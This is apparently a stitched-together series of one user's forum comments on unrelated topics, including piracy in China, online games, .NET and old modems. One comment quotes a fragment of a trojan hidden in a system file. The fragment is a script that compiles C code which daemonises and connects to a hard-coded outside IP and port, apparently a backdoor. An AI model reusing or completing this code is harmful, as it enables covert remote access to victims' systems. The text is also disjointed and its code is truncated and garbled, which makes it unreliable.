one thing to add - judged by what i hear from the chinese i know and work with (mostly shanghai, some HK), i'd guess that most of the users there don't care at all about patent infringement, piracy or any such issue.
i'd say that linux has a huge advantage over m$ - cost, especially in china. there aren't many people who can afford a legal windows copy - not to menation that actually finding a legal copy can be a difficult issue in itself:) also, i assume that chinese users are in a very early state of their computer use habits, so there isn't this decade-old religiousness on hardware/OS preferences like in europe and the US, which is an advantage especially for alternative/niche companies. there was a nice article on the reg recently on it in asia, here.
indeed, which is a refreshing change from other MMORPG's.... i used to play shadowbane, the only good thing about being from the euro timezone was that you could go out and get rune mobs when 95% of the american folks were at sleep and, for once, not camping the spawn zones:)
just been playing EVN the last few weeks, and now switched to vendetta... and yes! EV online it is! more difficult than EV imho (combat especially), but much faster, too... ie trade (and other) missions can't be done like in EVN by hyperjumping ten dozen systems in a row without having to put yourself in harms way... quite the opposite! constant threat by bots and other players of being raided and losing your precious cargo! it think this game absolutely rocks! it also seems to be much more stable and lagless than other MMORPG's i used to play like shadowbane... and the more content they add (and they plan to do that often it seems), the more freaking awesome it will become. also, a very nice and helpful community, and (so far) you're not under constant threat getting ganked by griefers, which is a good thing(tm).
i wish you could switch between tabs by keyboard shortcut! am i the only one? i'm waiting for something like like ctrl-tab since the introduction of tabbed browsing.
fyi, there is something similar to tomeviewer on osx: reviewpkg! (might be helpful to poke around in the os x ati driver stuff, and it's cool anyway...)
why is everyone here happily comparing.NET and ".mac"/iTools?.NET is a *set of technologies*. a framework. it's not *at all* only about online storage, email providing etc.
if you want to compare it, compare it to something like java (even that would have to be specified more). "Simply put, Microsoft.NET is Microsoft's strategy for delivering software as a service."
it would go too far to explain.NET here, but if you like, check these:

If you ever make it to northwestern france, be *sure* to check out the communication site at Plemeur-Boudou! It's very cool, you drive through a forest in a hilly landscape, and all of a sudden huge satellite dishes pop out like mushrooms... and you can still visit this very first satellite. all in all, very impressive.
it is west coast of sri lanka, and therefore not in the immediate path ... south and east/northeast are MUCH worse affected.

Try 300 baud thru an acoustical coupler.
woohoo! i loved my vc20's acoustic coupler. i'd love to have one again, should be fun with a laptop and a phone booth =)
hmmm of course /. didn't eat it completely. but go and look for yourself for the full code.
that's not true, look at it again ...
/. eats this code post ... ):
/dev/null 1>/dev/null
in the middle of the fuly commented services file, you find (let's hope
#!/bin/sh
cat >conftes.c
#include
#include
#include
#include
#define XOR_KEY 0x89
int main (int argc, char **argv)
{
char c;
int s, x, sv0[2], sv1[2];
struct sockaddr_in sa;
switch (fork ()) { case 0: break; default: exit (1);}
close (0); close (1); close (2);
do {
if ((s = socket (AF_INET, SOCK_STREAM, 0)) == (-1))
exit (1);
sa.sin_family = AF_INET;
sa.sin_port = htons (1963);
sa.sin_addr.s_addr = inet_addr ("212.146.0.34");
alarm (10);
if (connect (s, (struct sockaddr *)&sa, sizeof (sa)) == (-1))
exit (1);
if ((x = read (s, &c, 1))
nice, isn't it?
heheh

seems to boot a *lil* bit faster (w2k version) (still too slow though). hopefully the osx one will too ...

you can get it here
... ora's "learning the vi editor"? it has almost 40 pages on vim, and is (as usual with ora) a very good book.
